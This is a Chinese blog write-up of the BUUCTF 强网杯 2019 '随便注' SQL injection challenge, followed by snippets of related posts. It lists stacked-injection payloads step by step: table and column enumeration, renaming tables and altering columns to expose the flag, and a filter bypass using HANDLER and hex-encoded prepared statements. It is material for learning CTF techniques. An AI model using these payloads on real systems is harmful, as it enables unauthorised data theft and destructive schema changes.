【BUUCTF】[强网杯 2019]随便注 1

最新推荐文章于 2025-08-08 03:22:46 发布

原创最新推荐文章于 2025-08-08 03:22:46 发布 · 143 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#ctf

ctf 专栏收录该内容

19 篇文章

订阅专栏

本文通过一个具体的案例展示了如何利用SQL注入漏洞获取敏感信息。详细介绍了从发现注入点到最终获取flag的全过程，并演示了使用SQL语句进行表名、列名查询及数据操纵的方法。

在这里插入图片描述

提交查询，显示如下

在这里插入图片描述

测试注入点

1'

在这里插入图片描述

显示表名

1';show tables#

在这里插入图片描述

查看两个表中的列信息

1';show columns from `words`#

1';show columns from `1919810931114514`#

在这里插入图片描述

可知flag在第二个表内
我们可以看出页面回显的信息是有两列的，猜测默认显示第一个表中的内容，so我们想办法将第二个表重命名为words，将flag重命名为id

1';rename table `words` to words2;
rename table `1919810931114514` to `words`;
alter table words change flag id varchar(100);
show tables;
show columns from words;#

然后用1’ or 1=1;# 查出flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

studyovo_Hz

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

buuctf [强网杯 2019]随便注 1

weixin_45642610的博客

01-07

1万+

buuctf web [强网杯 2019]随便注 1 -刷题个人日记小白一个，写给自己看。打开后是这样。从题目和内容来看就是一道sql注入题。输入 1' or 1=1;# 这个#用来注释掉后面的sql语句显示所有数据，这个数据有什么用我也不知道，但sql注入一般第一步就是这样看看有没有有用的信息（没有）。输入 1' order by 2;# 1' order by 3;# 到第3列报错，说明只显示两列。输入1'; show tables;# 可以看到有 191981093

【BUUCTF】强网杯 2019随便注1 write up

GZWZ_的博客

04-06

5037

回显flag有好几种方法，但我只会一种┭┮﹏┭┮，如果有大佬会其他的，可不可以call我呢

参与评论您还未登录，请先登录后发表或查看评论

buuctf 强网杯 2019 随便注1

m0_63883187的博客

01-13

176

buuctf赛题日常解题

buuctf[强网杯2019随便注]

2403_89727669的博客

04-09

363

但是他的数据类型为int，而data与flag的类型均为varchar，所以我们在这里获得思路，可以将。发现words里面有两个字段，另一个只有一个字段，所以后台的查询语句应为。中新添加id字段，然后words的名字改为任意的，输入有关select的命令发现。

buuctf [强网杯 2019]随便注

weixin_51325053的博客

09-18

257

1和1a的查询效果一致，判断是字符型注入，sql语句中对查询的id应该是用单引号’包起来的。所以接下来我们应该如何查1919810931114514表的flag属性呢？那么联合查询，报错注入，布尔,时间盲注都无法使用了，我们还剩下堆叠注入。3. 我们可以得知原sql语句，应该是查words表的id和data。输入select，回显发现有关键字绕过！改完后，再查，即可获得flag。2-1查询不同，可知非数字型。(words用`号包裹）只查到了一个表flag。

【BUUCTF系列】[强网杯 2019]随便注

2402_84408069的博客

08-08

1249

本文通过一个SQL注入实例，展示了如何利用堆叠注入和HANDLER语句绕过WAF防护获取敏感数据的技术研究。作者首先通过简单的输入测试确认存在字符型注入漏洞，随后使用ORDER BY确定列数。当发现传统UNION注入被过滤后，转而采用堆叠注入技术，通过分号执行多条SQL语句，成功获取数据库表结构信息。重点介绍了利用MySQL的HANDLER语句直接读取数字命名表中的flag数据，该技术可绕过常见SELECT过滤。文章包含详细的技术解析、攻击链说明和防御建议，并特别强调所有技术仅限合法授权下的安全研究使用。

buuctf[强网杯 2019]随便注 1

2403_87464189的博客

03-18

370

那么总体理解就是，使用SeT方法给变量a赋值，给a变量赋的值就是select查询1919810931114514表的所有内容语句编码后的值，execsql方法执行来自a变量的值，prepare…from方法将执行后的编码变换成字符串格式，execute方法调用并执行execsql方法。select *from `1919810931114514` 编码为16进制。爆words表的内容1';这里我使用了16进制编码饶过对select的过滤。1' --+ 继续报错 1'# 成功回显。

BUUCTF[强网杯 2019]随便注的三种解法